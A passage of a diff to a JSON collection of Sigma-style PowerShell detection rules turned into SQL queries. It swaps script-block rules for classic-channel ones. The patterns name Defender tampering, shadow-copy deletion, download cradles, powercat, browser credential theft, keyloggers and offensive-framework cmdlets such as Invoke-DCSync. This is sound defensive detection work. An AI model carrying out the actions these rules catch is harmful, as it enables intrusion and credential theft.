'%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_token_obfuscation.yml" + "filename": "posh_pc_tamper_with_windows_defender.yml" }, { - "title": "Suspicious Export-PfxCertificate", - "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", + "id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", "status": "test", - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "author": "Florian Roth (Nextron Systems)", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (HostApplication LIKE '%-ModuleName %' ESCAPE '\\' OR HostApplication LIKE '%-ModulePath %' ESCAPE '\\' OR HostApplication LIKE '%-ScriptBlock %' ESCAPE '\\' OR HostApplication LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_export_pfxcertificate.yml" + "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - PsScript", - "id": "91e69562-2426-42ce-a647-711b8152ced6", - "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "title": "Use Get-NetTCPConnection", + "id": "b366adb4-d63d-422d-8a2c-186463b5ded0", + "status": "test", + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.reconnaissance", "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.t1049" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-NetTCPConnection%' ESCAPE '\\')" ], - "filename": "posh_ps_aadinternals_cmdlets_execution.yml" + "filename": "posh_pc_susp_get_nettcpconnection.yml" }, { - "title": "Access to Browser Login Data", - "id": "fc028194-969d-4122-8abe-0470d5b8f12f", + "title": "Remote PowerShell Session (PS Classic)", + "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", "status": "test", - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", - "author": "frack113", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Unknown" + "Legitimate use remote PowerShell sessions" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Opera Software\\\\Opera Stable\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\Default%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data For Account%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" ], - "filename": "posh_ps_access_to_browser_login_data.yml" + "filename": "posh_pc_remote_powershell_session.yml" }, { - "title": "Potential Keylogger Activity", - "id": "965e2db9-eddb-4cf6-a986-7a967df651e4", - "status": "experimental", - "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", + "id": "71ff406e-b633-4989-96ec-bc49d825a412", + "status": "test", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ "attack.collection", - "attack.credential_access", - "attack.t1056.001" + "attack.t1074.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Compress-Archive %' ESCAPE '\\' AND HostApplication LIKE '% -Path %' ESCAPE '\\' AND HostApplication LIKE '% -DestinationPath %' ESCAPE '\\' AND HostApplication LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_keylogger_activity.yml" + "filename": "posh_pc_susp_zip_compress.yml" }, { - "title": "Execution via CL_Mutexverifiers.ps1", - "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", - "status": "test", - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "PowerShell Downgrade Attack - PowerShell", + "id": "6331d09b-4785-4c13-980f-f96661356249", + "status": "experimental", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND EngineVersion LIKE '2.%' ESCAPE '\\' AND NOT (HostVersion LIKE '2.%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" + "filename": "posh_pc_downgrade_attack.yml" }, { - "title": "Windows Screen Capture with CopyFromScreen", - "id": "d4a11f63-2390-411c-9adf-d791fd152830", + "title": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", + "id": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", "status": "experimental", - "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", - "author": "frack113", + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", "tags": [ - "attack.collection", - "attack.t1113" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%.CopyFromScreen%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ConsoleHost' AND (HostApplication LIKE '%bxor%' ESCAPE '\\' OR HostApplication LIKE '%join%' ESCAPE '\\' OR HostApplication LIKE '%char%' ESCAPE '\\'))" ], - "filename": "posh_ps_capture_screenshots.yml" + "filename": "posh_pc_xor_commandline.yml" }, { - "title": "Import PowerShell Modules From Suspicious Directories", - "id": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", - "status": "experimental", - "description": "Detects powershell scripts that import modules from suspicious directories", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell Called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "status": "test", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" ], - "filename": "posh_ps_import_module_susp_dirs.yml" + "filename": "posh_pc_exe_calling_ps.yml" }, { - "title": "Powershell Execute Batch Script", - "id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", + "title": "Renamed Powershell Under Powershell Channel", + "id": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", "status": "test", - "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", - "author": "frack113", + "description": "Detects renamed powershell", + "author": "Harish Segar, frack113", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administration script" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.cmd%' ESCAPE '\\' OR ScriptBlockText LIKE '%.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostName = 'ConsoleHost' AND NOT ((HostApplication LIKE 'powershell.exe%' ESCAPE '\\' OR HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_execute_batch_script.yml" + "filename": "posh_pc_renamed_powershell.yml" }, { - "title": "Powershell Add Name Resolution Policy Table Rule", - "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "title": "Suspicious Non PowerShell WSMAN COM Provider", + "id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", "status": "test", - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "author": "Borna Talebi", + "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.impact", - "attack.t1565" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND ProviderName = 'WSMan' AND NOT (HostApplication LIKE '%powershell%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_dnsclient_rule.yml" + "filename": "posh_pc_wsman_com_provider_no_powershell.yml" }, { - "title": "Active Directory Group Enumeration With Get-AdGroup", - "id": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", - "status": "experimental", - "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", + "title": "Delete Volume Shadow Copies Via WMI With PowerShell", + "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1069.002" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdGroup %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_adgroup.yml" + "filename": "posh_pc_delete_volume_shadow_copies.yml" }, { - "title": "Service Registry Permissions Weakness Check", - "id": "95afc12e-3cbb-40c3-9340-84a032e596a3", + "title": "Netcat The Powershell Version", + "id": "c5b20776-639a-49bf-94c7-84f912b91c15", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1574.011" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-acl%' ESCAPE '\\' AND ScriptBlockText LIKE '%REGISTRY::HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (HostApplication LIKE '%powercat %' ESCAPE '\\' OR HostApplication LIKE '%powercat.ps1%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_acl_service.yml" + "filename": "posh_pc_powercat.yml" }, { - "title": "Use Remove-Item to Delete File", - "id": "b8af5f36-1361-4ebe-9e76-e36128d947bf", - "status": "test", - "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", - "author": "frack113", + "title": "Nslookup PowerShell Download Cradle", + "id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "status": "experimental", + "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", + "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '%HKCU:\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%HKLM:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%powershell%' ESCAPE '\\' AND HostApplication LIKE '%nslookup%' ESCAPE '\\' AND (HostApplication LIKE '%-q=txt%' ESCAPE '\\' OR HostApplication LIKE '%-querytype=txt%' ESCAPE '\\'))" ], - "filename": "posh_ps_remove_item_path.yml" + "filename": "posh_pc_abuse_nslookup_with_dns_records.yml" }, { - "title": "Active Directory Computers Enumeration with Get-AdComputer", - "id": "36bed6b2-e9a0-4fff-beeb-413a92b86138", + "title": "Suspicious PowerShell Download", + "id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", "status": "experimental", - "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.", - "author": "frack113", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "PowerShell scripts that download content from the Internet" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Net.WebClient%' ESCAPE '\\' AND (HostApplication LIKE '%.DownloadFile(%' ESCAPE '\\' OR HostApplication LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_adcomputer.yml" + "filename": "posh_pc_susp_download.yml" }, { - "title": "Malicious PowerShell Commandlets - ScriptBlock", - "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "title": "Alternate PowerShell Hosts", + "id": "d7326048-328b-4d5e-98af-86e84b17c765", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' 